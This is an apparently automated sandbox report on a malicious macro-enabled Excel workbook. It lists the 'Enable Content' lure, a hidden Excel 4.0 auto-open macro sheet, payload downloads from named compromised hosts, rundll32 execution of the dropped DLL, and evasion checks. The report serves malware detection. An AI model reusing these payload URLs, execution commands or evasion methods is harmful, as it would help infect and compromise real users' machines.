Source: EXCEL.EXE, 00000000.00000002.759373114.0000000004F90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.586705764.0000000001EA0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.749938496.0000000001EA0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000007.00000002.749938496.0000000001EA0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\30817388.png
Source: unknown DNS traffic detected: queries for: sadabahar.com.np
Source: global traffic HTTP traffic detected:
GET /wp-includes/pUMqITCt83a/ HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: sadabahar.com.np
Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
GET /wp-content/we8xi/ HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: www.duoyuhudong.cn
Connection: Keep-Alive

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to read data from the clipboard
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E445E70 GetOpenClipboardWindow,GetDesktopWindow,GetCurrentThreadId,GetUserDefaultUILanguage,GetProcessWindowStation,GetUserDefaultUILanguage,GetEnvironmentStringsW,GetProcessWindowStation, 3_2_6E445E70

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled editing. please click "Enable Content
Source: Screenshot number: 4 Screenshot OCR: protected documents. 3 4 CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled edi
Source: Screenshot number: 4 Screenshot OCR: Enable Content" button 6 7 8 9 10 11 12 13 14 15 16 17 18 ^
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, please click "Enable Content"
Source: Document image extraction number: 0 Screenshot OCR: protected documents. CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, p
Source: Document image extraction number: 0 Screenshot OCR: Enable Content" button
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, please click "Enable Content"
Source: Document image extraction number: 1 Screenshot OCR: protected documents. CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, p
Source: Document image extraction number: 1 Screenshot OCR: Enable Content" button
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Z8LJs4fFM8[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\besta.ocx
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Nrenernv\
Detected potential crypto function
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_024E6743 0_2_024E6743
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_024E6340 0_2_024E6340
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_024E6753 0_2_024E6753
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_024E66E8 0_2_024E66E8
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_024E66F3 0_2_024E66F3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018562B 3_2_0018562B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019E05C 3_2_0019E05C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018601A 3_2_0018601A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00191E11 3_2_00191E11
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00199209 3_2_00199209
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019C400 3_2_0019C400
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019AC3D 3_2_0019AC3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019EC30 3_2_0019EC30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019CE32 3_2_0019CE32
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018A833 3_2_0018A833
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00193C28 3_2_00193C28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018A02A 3_2_0018A02A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018C227 3_2_0018C227
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00198851 3_2_00198851
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00194E55 3_2_00194E55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019D454 3_2_0019D454
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018F443 3_2_0018F443
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019C879 3_2_0019C879
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_001A0E72 3_2_001A0E72
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00184871 3_2_00184871
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00196A6B 3_2_00196A6B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00190660 3_2_00190660
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_001A1E60 3_2_001A1E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019988A 3_2_0019988A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019D88A 3_2_0019D88A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00195C8A 3_2_00195C8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00189082 3_2_00189082
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019B2B8 3_2_0019B2B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_001940BB 3_2_001940BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_001922BB 3_2_001922BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00191ABD 3_2_00191ABD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00190AA8 3_2_00190AA8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018B0AC 3_2_0018B0AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00193AA0 3_2_00193AA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019C6D9 3_2_0019C6D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_001970D1 3_2_001970D1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018E6CA 3_2_0018E6CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018B8CA 3_2_0018B8CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00195ECA 3_2_00195ECA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018D2C4 3_2_0018D2C4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00181EC4 3_2_00181EC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_001956F8 3_2_001956F8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019AAF3 3_2_0019AAF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_001868F2 3_2_001868F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_001876EE 3_2_001876EE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019E31F 3_2_0019E31F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00181914 3_2_00181914
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018610E 3_2_0018610E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00197900 3_2_00197900
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00198103 3_2_00198103
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00193158 3_2_00193158
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018B354 3_2_0018B354
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019E554 3_2_0019E554
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019DD54 3_2_0019DD54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00182756 3_2_00182756
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00192B4A 3_2_00192B4A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00197D4C 3_2_00197D4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019114E 3_2_0019114E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019AF4E 3_2_0019AF4E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00182D46 3_2_00182D46
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00198D7C 3_2_00198D7C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018A17E 3_2_0018A17E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018AD68 3_2_0018AD68
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00184D6B 3_2_00184D6B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00187361 3_2_00187361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00192963 3_2_00192963
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00195198 3_2_00195198
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00187990 3_2_00187990
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018ED92 3_2_0018ED92
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019A797 3_2_0019A797
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00185D88 3_2_00185D88
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00187582 3_2_00187582
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019B587 3_2_0019B587
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019E9BB 3_2_0019E9BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_001833B5 3_2_001833B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018B7B7 3_2_0018B7B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019F1AF 3_2_0019F1AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019CFA1 3_2_0019CFA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018EBA2 3_2_0018EBA2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00196DA4 3_2_00196DA4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_001935DB 3_2_001935DB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00194BDA 3_2_00194BDA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018E3C6 3_2_0018E3C6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_001975F1 3_2_001975F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018F1F6 3_2_0018F1F6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018FDE3 3_2_0018FDE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_001831E4 3_2_001831E4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018DBE7 3_2_0018DBE7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E445900 3_2_6E445900
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E446530 3_2_6E446530
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E452C20 3_2_6E452C20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E474CE0 3_2_6E474CE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E461C80 3_2_6E461C80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E45FC91 3_2_6E45FC91
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E442C90 3_2_6E442C90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E46AA20 3_2_6E46AA20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E46FB69 3_2_6E46FB69
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E474BB3 3_2_6E474BB3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E44E660 3_2_6E44E660
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E45C25A 3_2_6E45C25A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E4712EC 3_2_6E4712EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E449320 3_2_6E449320
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E45C032 3_2_6E45C032
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 6E454EB0 appears 49 times
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: CC15.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Abnormally high CPU usage
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Found a hidden Excel 4.0 Macro sheet
Source: sin t#U00edtulo_0212.xlsm Macro extractor: Sheet name: Buk2
Source: sin t#U00edtulo_0212.xlsm Macro extractor: Sheet name: Buk5
Source: sin t#U00edtulo_0212.xlsm Macro extractor: Sheet name: Buk1
Source: sin t#U00edtulo_0212.xlsm Macro extractor: Sheet name: Buk7
Source: sin t#U00edtulo_0212.xlsm Macro extractor: Sheet name: EFEWF
Source: sin t#U00edtulo_0212.xlsm Macro extractor: Sheet name: Buk3
Source: sin t#U00edtulo_0212.xlsm Macro extractor: Sheet name: Buk4
Source: sin t#U00edtulo_0212.xlsm Macro extractor: Sheet name: Buk6
Excel document contains an embedded macro which executes code when the document is opened
Source: workbook.xml Binary string: \Desktop\Fil\1d\Cir\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{D6BAC37D-0CE8-4F19-A286-32FB1AEC3273}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Sheet" sheetId="1" r:id="rId1"/><sheet name="Ss1" sheetId="2" state="hidden" r:id="rId2"/><sheet name="Ss1br2" sheetId="3" state="hidden" r:id="rId3"/><sheet name="Ssbr3" sheetId="4" state="hidden" r:id="rId4"/><sheet name="EFEWF" sheetId="5" state="hidden" r:id="rId5"/><sheet name="Buk1" sheetId="6" state="hidden" r:id="rId6"/><sheet name="Buk2" sheetId="7" state="hidden" r:id="rId7"/><sheet name="Buk3" sheetId="8" state="hidden" r:id="rId8"/><sheet name="Buk4" sheetId="9" state="hidden" r:id="rId9"/><sheet name="Buk5" sheetId="10" state="hidden" r:id="rId10"/><sheet name="Buk6" sheetId="11" state="hidden" r:id="rId11"/><sheet name="Buk7" sheetId="12" state="hidden" r:id="rId12"/></sheets><definedNames><definedName name="LKLW">EFEWF!$D$3</definedName><definedName name="SASA">EFEWF!$D$17</definedName><definedName name="SASA1">EFEWF!$D$19</definedName><definedName name="SASA2">EFEWF!$D$21</definedName><definedName name="_xlnm.Auto_Open">EFEWF!$D$1</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures"><xcalcf:calcFeatures><xcalcf:feature name="microsoft.com:RD"/><xcalcf:feature name="microsoft.com:FV"/></xcalcf:calcFeatures></ext></extLst></workbook>
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write
Source: sin t#U00edtulo_0212.xlsm Virustotal: Detection: 22%
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.8898178241
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Nrenernv\nnave.jwm",ILDADvMws
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.8898178241
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Nrenernv\nnave.jwm",ILDADvMws
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$sin t#U00edtulo_0212.xlsm
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD9AB.tmp
Source: classification engine Classification label: mal100.expl.evad.winXLSM@8/7@2/2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E44AEB0 CoCreateInstance,OleRun, 3_2_6E44AEB0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.8898178241
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E44DC50 LoadLibraryExW,LoadLibraryExW,LoadLibraryExW,FindResourceW,LoadResource,SizeofResource,MultiByteToWideChar,FreeLibrary, 3_2_6E44DC50
Source: EXCEL.EXE, 00000000.00000002.759373114.0000000004F90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.586705764.0000000001EA0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.749938496.0000000001EA0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: Window Recorder Window detected: More than 3 window changes detected
Source: sin t#U00edtulo_0212.xlsm Initial sample: OLE zip file path = xl/worksheets/sheet4.xml
Source: sin t#U00edtulo_0212.xlsm Initial sample: OLE zip file path = xl/media/image1.png
Source: sin t#U00edtulo_0212.xlsm Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: sin t#U00edtulo_0212.xlsm Initial sample: OLE zip file path = xl/worksheets/_rels/sheet3.xml.rels
Source: sin t#U00edtulo_0212.xlsm Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: sin t#U00edtulo_0212.xlsm Initial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
Source: sin t#U00edtulo_0212.xlsm Initial sample: OLE zip file path = xl/calcChain.xml
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: CC15.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E454F00 push ecx; ret 3_2_6E454F13
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E476451 push ecx; ret 3_2_6E476464
PE file contains an invalid checksum
Source: besta.ocx.0.dr Static PE information: real checksum: 0x72da1 should be: 0x75752
Source: Z8LJs4fFM8[1].dll.0.dr Static PE information: real checksum: 0x72da1 should be: 0x75752

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Nrenernv\nnave.jwm (copy)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Z8LJs4fFM8[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\besta.ocx
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Nrenernv\nnave.jwm (copy)
Drops PE files to the user directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\besta.ocx

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\besta.ocx

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Nrenernv\nnave.jwm:Zone.Identifier read attributes | delete
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 000000006E446570 second address: 000000006E4465AB instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [esp+000000F8h], ecx 0x0000000a test edx, edx 0x0000000c jne 00007F3180DA6CC7h 0x0000000e mov dword ptr [esp+14h], 0B8FEA98h 0x00000016 rdtscp
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 000000006E447835 second address: 000000006E447863 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [ebp-08h], ecx 0x00000006 test edx, edx 0x00000008 jne 00007F3180BCE7B1h 0x0000000a mov ebx, 05F1FEE1h 0x0000000f rdtscp
Found dropped PE file which has not been started or loaded
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Windows\SysWOW64\Nrenernv\nnave.jwm (copy)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Z8LJs4fFM8[1].dll
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_024E6743 rdtsc 0_2_024E6743
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 6.5 %
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E46B531 FindFirstFileExA, 3_2_6E46B531
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E456FA9 IsDebuggerPresent,OutputDebugStringW, 3_2_6E456FA9
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E46C928 GetProcessHeap, 3_2_6E46C928
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_024E6743 rdtsc 0_2_024E6743
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018DB4C mov eax, dword ptr fs:[00000030h] 3_2_0018DB4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E446530 mov eax, dword ptr fs:[00000030h] 3_2_6E446530
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E446530 mov eax, dword ptr fs:[00000030h] 3_2_6E446530
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E464E12 mov eax, dword ptr fs:[00000030h] 3_2_6E464E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E4479C0 mov eax, dword ptr fs:[00000030h] 3_2_6E4479C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E457254 mov esi, dword ptr fs:[00000030h] 3_2_6E457254
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E46B306 mov eax, dword ptr fs:[00000030h] 3_2_6E46B306
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E454D87 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6E454D87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E45453A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_6E45453A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E45D314 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6E45D314

HIPS / PFW / Operating System Protection Evasion:

Yara detected Xls With Macro 4.0
Source: Yara match File source: app.xml, type: SAMPLE
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Nrenernv\nnave.jwm",ILDADvMws
Source: EXCEL.EXE, 00000000.00000002.750116281.00000000008A0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.749896992.0000000000AA0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: EXCEL.EXE, 00000000.00000002.750116281.00000000008A0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.749896992.0000000000AA0000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: EXCEL.EXE, 00000000.00000002.750116281.00000000008A0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.749896992.0000000000AA0000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 3_2_6E473FE7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 3_2_6E473C6E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 3_2_6E473C23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 3_2_6E473D09
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 3_2_6E473D97
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 3_2_6E473B7A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 3_2_6E4739A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 3_2_6E46C608
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 3_2_6E474218
